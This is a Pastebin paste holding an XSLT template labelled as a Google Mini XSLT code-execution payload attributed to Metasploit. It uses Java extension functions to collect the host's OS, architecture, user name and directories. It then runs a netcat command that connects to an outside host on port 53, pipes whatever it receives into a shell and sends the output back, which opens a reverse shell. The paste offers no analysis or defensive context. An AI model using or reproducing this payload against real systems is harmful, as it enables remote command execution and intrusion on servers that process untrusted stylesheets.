Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <xsl:template
- name="my_page_footer"
- xmlns:sys="http://www.oracle.com/XSL/Transform/java/java.lang.System"
- xmlns:run="http://www.oracle.com/XSL/Transform/java/java.lang.Runtime"
- >
- <!-- Google Mini XSLT Code Execution [metasploit] -->
- XSLT Version: <xsl:value-of select="system-property('xsl:version')"/> <br />
- XSLT Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> <br />
- XSLT URL: <xsl:value-of select="system-property('xsl:vendor-url')" /> <br />
- OS: <xsl:value-of select="sys:getProperty('os.name')" /> <br />
- Version: <xsl:value-of select="sys:getProperty('os.version')" /> <br />
- Arch: <xsl:value-of select="sys:getProperty('os.arch')" /> <br />
- UserName: <xsl:value-of select="sys:getProperty('user.name')" /> <br />
- UserHome: <xsl:value-of select="sys:getProperty('user.home')" /> <br />
- UserDir: <xsl:value-of select="sys:getProperty('user.dir')" /> <br />
- Executing command...<br />
- <xsl:value-of select="run:exec(run:getRuntime(), 'sh -c nc ptest.men 53 |sh |nc ptest.men 53')" />
- </span>
- </xsl:template>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
